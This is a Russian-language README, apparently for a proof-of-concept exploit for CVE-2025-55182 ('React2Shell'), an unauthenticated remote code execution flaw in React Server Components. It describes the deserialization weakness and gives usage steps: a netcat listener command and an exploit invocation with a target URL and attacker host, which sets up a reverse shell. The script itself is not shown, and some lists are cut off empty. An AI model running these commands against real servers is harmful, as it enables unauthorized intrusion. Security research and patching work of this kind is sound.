
Эксплойт proof-of-concept для CVE-2025-55182 (React2Shell), неаутентифицированная уязвимость удаленного выполнения кода в React Server Components через специально сформированные payloads протокола Flight.
CVE-2025-55182, также известный как React2Shell, представляет собой критическую уязвимость неаутентифицированного удалённого выполнения кода (RCE), затрагивающую пакеты React Server Components (версии 19.0, 19.1.0, 19.1.1 и 19.2.0).
Эта уязвимость может позволить атакующим выполнить произвольный код на уязвимых серверах с помощью одного специально сформированного HTTP-запроса без необходимости аутентификации.
React Server Components используют Flight-протокол для сериализации и десериализации данных компонентов, которыми обмениваются клиент и сервер.
Некорректная проверка в процессе этой десериализации может позволить специально сформированным полезным нагрузкам манипулировать внутренними структурами объектов и достигать опасных примитивов выполнения JavaScript.
Уязвимость возникает из-за недостаточной проверки при десериализации полезных нагрузок Flight-протокола React Server Components (RSC).
Специально сформированные полезные нагрузки могут:
multipart/form-dataЗапустите слушатель на вашей машине:
nc -lvnp 4444
Запустите эксплойт:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
Для смягчения этой уязвимости:
- Microsoft Security – Защита от React2Shell
- Совет по безопасности React (официальное раскрытие)
Данный проект предоставляется строго для:
Авторы не несут ответственности за неправомерное использование или ущерб, причинённый данным материалом. Пользователи несут единоличную ответственность за соблюдение всех применимых законов и нормативных актов.